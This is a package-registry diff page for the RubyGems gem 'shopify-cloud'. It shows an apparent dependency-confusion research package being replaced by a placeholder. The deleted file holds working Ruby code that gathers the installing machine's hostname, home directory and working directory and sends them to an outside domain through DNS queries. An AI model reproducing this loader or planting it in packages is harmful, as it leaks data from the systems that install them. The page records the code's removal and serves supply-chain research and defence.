RubyGems - shopify-cloud - Versions diffs - 2300.4.2 → 9001.0 - Mend

shopify-cloud 2300.4.2 → 9001.0

Files changed (7) hide show

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: cc90152107465aff369870b099d498aaad4e34597151f100caff81e8a150fb24
-  data.tar.gz: 4df10ee9b2c3f5e1bb05ebe2b2d6d7f9608c561969d8b6b8c06ec08b73c23129
+  metadata.gz: 879a877f879f1e403e5c51097e76e5d641383ed0809004f04a10544f080c9d6b
+  data.tar.gz: 6aca7d0925e8b55c739f16659cd06756b78e610f36a8b506dc9ab6cecdf4fe1e
 SHA512:
-  metadata.gz: 24b344ada3dc706692be320d68b3e2fd5256969badd210e4a55805dc4e58b4371e76cb91d00c4c58c5157e5577686d7cbcfbceac4f9b7072fbee9e4aac33153e
-  data.tar.gz: 5922cfb04864a379a41d2c8980cc018c9053d0ab9cf24a42ac5b137f4a5429610126f1ceb928fab55d5dd66f09801f674ddd0525982a5c32f9c0fd183fcddf4f
+  metadata.gz: 3ebc951d4823b6cafc8252984711e0d205450a7cc52f9f05516e032634124c969e510b7abb5899781f3fd4f41330abd022a5dbb0968a403a485e8806a15add14
+  data.tar.gz: b1e5cab9df1e8bbf2d651b3d86cafdc3a226f99da2266eecc66304a66e7c3effe4120decb5cb738bad61d4d755b45a9bbe3e34405f6463132080bef681cd028a

data/Gemfile ADDED

File without changes

data/Rakefile ADDED

File without changes

data/VERSION ADDED

	@@ -0,0 +1 @@
1	+ 1000.0

data/lib/gem.rb ADDED

	@@ -0,0 +1 @@
1	+ raise 'this is an internal-only gem'

metadata CHANGED

@@ -1,28 +1,29 @@
 --- !ruby/object:Gem::Specification
 name: shopify-cloud
 version: !ruby/object:Gem::Version
-  version: 2300.4.2
+  version: '9001.0'
 platform: ruby
 authors:
-- Alex Birsan
-autorequire:
+- admins@shopify.com
+autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-09-14 00:00:00.000000000 Z
+date: 2020-01-01 00:00:00.000000000 Z
 dependencies: []
-description: This package is meant for security research purposes and does not contain
-  any useful code.
-email: alex@ethicalhack.ro
+description:
+email:
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- lib/shopify-cloud.rb
-homepage: https://twitter.com/alxbrsn
-licenses:
-- MIT
+- Gemfile
+- Rakefile
+- VERSION
+- lib/gem.rb
+homepage:
+licenses: []
 metadata: {}
-post_install_message:
+post_install_message:
 rdoc_options: []
 require_paths:
 - lib
@@ -38,7 +39,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
       version: '0'
 requirements: []
 rubygems_version: 3.0.3
-signing_key:
+signing_key:
 specification_version: 4
-summary: Security research purposes only
+summary: placeholder gem
 test_files: []

data/lib/shopify-cloud.rb DELETED

@@ -1,64 +0,0 @@
-=begin
-This code is used for research purposes.
-No sensitive data is retrieved.
-Callbacks from within organizations with a
-responsible disclosure policy will be reported
-directly to the organizations.
-Any other callbacks will be ignored, and
-any associated data will not be kept.
-For any questions or suggestions:
-alex@ethicalhack.ro
-https://twitter.com/alxbrsn
-=end
-require 'socket'
-require 'json'
-require 'resolv'
-suffix = '.dns.alexbirsan-hacks-paypal.com'
-ns = 'dns1.alexbirsan-hacks-paypal.com'
-package = 'shopify-cloud'
-# only the bare minimum to be able to identify
-# a vulnerable organization
-data = {
-    'p' => package,
-    'h' => Socket.gethostname,
-    'd' => File.expand_path('~'),
-    'c' => Dir.pwd
-}
-data = JSON.generate(data)
-data = data.unpack('H*')[0].scan(/.{1,60}/)
-id_1 = rand(36**12).to_s(36)
-id_2 = rand(36**12).to_s(36)
-begin
-    ns_ip = Resolv.getaddress(ns)
-rescue
-    ns_ip = '4.4.4.4'
-end
-custom_res = Resolv.new([Resolv::Hosts.new,
-    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
-data.each.each_with_index do |chunk, idx|
-    begin
-        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
-    rescue; end
-    begin
-        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
-    rescue; end
-end